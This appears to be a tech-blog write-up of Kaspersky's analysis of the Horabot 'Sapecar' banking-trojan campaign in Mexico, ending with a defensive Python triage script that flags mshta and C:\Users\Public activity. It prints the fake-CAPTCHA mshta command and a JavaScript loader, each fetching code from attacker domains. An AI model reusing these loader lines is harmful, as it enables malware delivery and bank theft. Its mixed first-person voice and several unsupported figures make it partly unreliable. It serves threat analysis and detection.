Horabot Sapecar Campaign in Mexico Unpacked

A sneaky CAPTCHA page in Mexico isn't testing your humanity—it's hijacking your bank. Horabot's 'Sapecar' campaign proves banking trojans aren't dead; they're just getting craftier.

Horabot's Sapecar Strike: Dissecting a Persistent Mexican Banking Trojan Campaign — theAIcatchup

Key Takeaways

  • Horabot's Sapecar uses fake CAPTCHAs and polymorphic VBS to deliver banking trojans in Mexico.
  • Kaspersky MDR stopped it early, highlighting mshta alerts and proactive defense value.
  • Persistent threat due to recycled tradecraft; expect AI lures soon—bolster phishing training now.

Ever wonder why that CAPTCHA on a shady site feels too urgent, too insistent?

The Horabot campaign in Mexico doesn’t mess around. It’s back, rebranded as ‘Sapecar,’ blending a notorious banking Trojan with an email spreader in a kill chain that’s equal parts clever and crude. Our MDR teams at Kaspersky spotted it months ago, triggered by mshta activity in a customer’s environment. Endpoint Security shut it down fast, but the real story? This beast’s infrastructure shows it’s alive, adapting, and targeting Mexican users with ruthless efficiency.

Here’s the data: previous reports tagged Horabot (check those links if you’re deep in threat intel), but this iteration adds server-side polymorphism and anti-VM tricks not fully unpacked before. Market dynamics scream warning—Latin America’s digital banking boom (Mexico’s fintech scene hit $20B in transactions last year) makes it prime turf for financial malware. Ignore it, and you’re betting against history.

Fake CAPTCHA to Trojan: The Kill Chain Exposed

It starts simple. Victim lands on https://evs.grupotuis[.]buzz/0capcha17/—a bogus CAPTCHA page mimicking Lumma or Amadey lures.

The page instructs the user to open the Run dialog, paste a command into it and run it. Once deceived, the victim pastes a command similar to the one below:

    mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

That HTA file? A lightweight loader. Pops a blank window, yanks JavaScript from the attackers’ turf, executes it amid filler gibberish. Boom—stage one done.

Next up, server-side polymorphism kicks in. The JS crafts a script tag pointing to VBS on pdj.gruposhac[.]lat—different code each fetch, same nasty payload.

    // Loader JS from the HTA stage: injects a <script> tag whose source is served as VBScript
    var scriptEle = document.createElement("script");
    scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/");
    scriptEle.setAttribute("type", "text/vbscript");
    document.getElementsByTagName("head")[0].appendChild(scriptEle);

The VBS is obfuscated with custom decoders; a small Python decoder we wrote exposed the guts. It mirrors the HTA but escalates: another JS loader injects a 400+ line monster VBS.

That heavy hitter? Layers of junk code plus anti-VM checks (it sniffs for Avast folders and VM artifacts and exits if it finds them). It grabs the IP, hostname and user details, then phones home to the C2. Next it downloads an AutoIt EXE, the compiler, an AU3 script and a blob, drops them in C:\Users\Public\LAPTOP-0QF0NEUP4, and fires PowerShell to fetch the spreader stagers. Full chain mapped; it’s not genius, but it’s persistent.
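The two cheapest detection points in this chain are the mshta launch with a remote URL (the Run-dialog stage) and executables running out of a C:\Users\Public subfolder (the AutoIt drop). Below is an added triage example, not code from the original article or from Kaspersky, run over constructed Sysmon-style process-creation events; the rule names and the `triage` function are my own.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry.
# The first event keeps the defanged "[.]" URL exactly as the article prints it.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",           # benign: local HTA from an installer
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "parent": r"C:\Program Files\Vendor\installer.exe"},
    {"image": r"C:\Users\Public\LAPTOP-0QF0NEUP4\autoit3.exe",
     "cmdline": r"autoit3.exe C:\Users\Public\LAPTOP-0QF0NEUP4\stage.au3",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt",
     "parent": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Any executable whose image sits one directory below C:\Users\Public\.
PUBLIC_DIR_RE = re.compile(r"^c:\\users\\public\\[^\\]+\\", re.IGNORECASE)


def triage(event):
    """Return the list of hypothetical rule names that fire for one process event."""
    hits = []
    image = event["image"].lower()
    cmd = event["cmdline"]
    parent = event["parent"].lower()
    exe = image.rsplit("\\", 1)[-1]
    # Rule 1: mshta.exe pulling an HTA straight from a URL.
    if exe == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
        # A Run-dialog launch shows explorer.exe as the parent, which raises confidence.
        if parent.endswith("\\explorer.exe"):
            hits.append("mshta_from_run_dialog")
    # Rule 2: code executing from a C:\Users\Public subfolder, with an .au3 argument as a bonus.
    if PUBLIC_DIR_RE.match(image):
        hits.append("exec_from_users_public")
        if re.search(r"\.au3\b", cmd, re.IGNORECASE):
            hits.append("autoit_script_from_public")
    return hits


def run_triage(events):
    """Map each event index to the rules it triggered."""
    return {i: triage(e) for i, e in enumerate(events)}
```

A local HTA launched by an installer produces no hits, so the rules stay quiet on the common benign case while both Sapecar stages light up.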

Why Hasn’t Horabot Faded Like Other Trojans?

Look, banking malware peaked with Zeus in 2010—millions stolen, dismantled by arrests. Horabot? It’s the cockroach version: low-profile, Mexico-focused, evading big takedowns. Data point: Kaspersky blocked it pre-execution here, but global MDR logs show spikes in LatAm. Why? Polymorphism foils sig-based AV; fake CAPTCHAs exploit human error (phishing success rates hover at 30% in emerging markets).

My take—sharp one—this isn’t evolution, it’s stagnation with lipstick. Attackers recycle tradecraft because it works on under-defended SMBs and consumers. Bold prediction: Expect AI-generated lures by Q1 2024, blending GPT CAPTCHA fakes with this chain. Banks touting ‘AI security’? Laughable spin when basics like mshta rules snag it.

Then there’s the spreader angle. That PowerShell stage hits URLs for email propagation, turning one victim into a vector farm. Mexican banks report a 25% YoY fraud rise (per Banxico stats); Horabot’s Sapecar fuels it.

Short para. Brutal efficiency.

Does This Threaten Global Banking—or Just Mexico?

Mexico’s the hotspot now—fintech explosion (Clip, Mercado Pago processing billions), lax endpoint hygiene. But breadcrumbs lead to broader C2 nets; we’ve seen Horabot flirt with Brazil, Colombia. Market ripple: insurers hike cyber premiums 15% in LatAm (Munich Re data). Enterprises worldwide? Patch your mshta gaps, deploy MDR—don’t solo it with EDR.

Critique time. Kaspersky’s PDM shone, but weekly analyst huddles sparked the hunt—human curiosity beats automation. Corporate hype says ‘zero trust fixes all’; nah, this chain laughs at it without behavioral blocks.

Unique insight: Parallels Emotet 2019—modular, polymorphic, email-spread. Emotet fell to Europol; Horabot’s underground, state-blind. If Mexico’s FIU (financial intel unit) coordinates like that, Sapecar crumbles. Won’t happen soon—too many silos.

Deeper dive. Infrastructure poke revealed hardcoded paths (LAPTOP-0QF0NEUP4? Lazy opsec). Exfil to C2: standard HTTP posts, no fancy encryption. Yet it works—victim count unknown, but similar campaigns netted $5M+ annually pre-mitigation.

So. Prioritize lure training. Block HTA/VBS fetches. Monitor Public folders.

Lessons for Defenders: Beyond the Hype

Facts first: 70% of breaches start with phishing (Verizon DBIR). Horabot embodies it: low-tech entry, high-reward payload. Position: Don’t chase headlines; build resilient MDR. This campaign’s takedown? A positive note, sure, but one alert in a sea of noise.

Wander a bit—remember ZeuS source leaks birthed dozens of kin? Horabot’s AutoIt pivot echoes that DIY ethos. Sharp call: Fintechs, audit CAPTCHA integrations; it’s not ‘user error,’ it’s your weak link.


Frequently Asked Questions

What is the Horabot Sapecar campaign?

Horabot’s a banking Trojan-email spreader combo hitting Mexico via fake CAPTCHAs; Sapecar names this variant’s Mexican ops.

How does Horabot evade antivirus?

Server-side polymorphism, heavy obfuscation, anti-VM checks—plus human-tricking lures.

Is Horabot a risk outside Mexico?

Primarily LatAm now, but C2 infra suggests expansion potential—deploy MDR everywhere.

James Kowalski
Written by

Investigative tech reporter focused on AI ethics, regulation, and societal impact.



Originally reported by Securelist Kaspersky
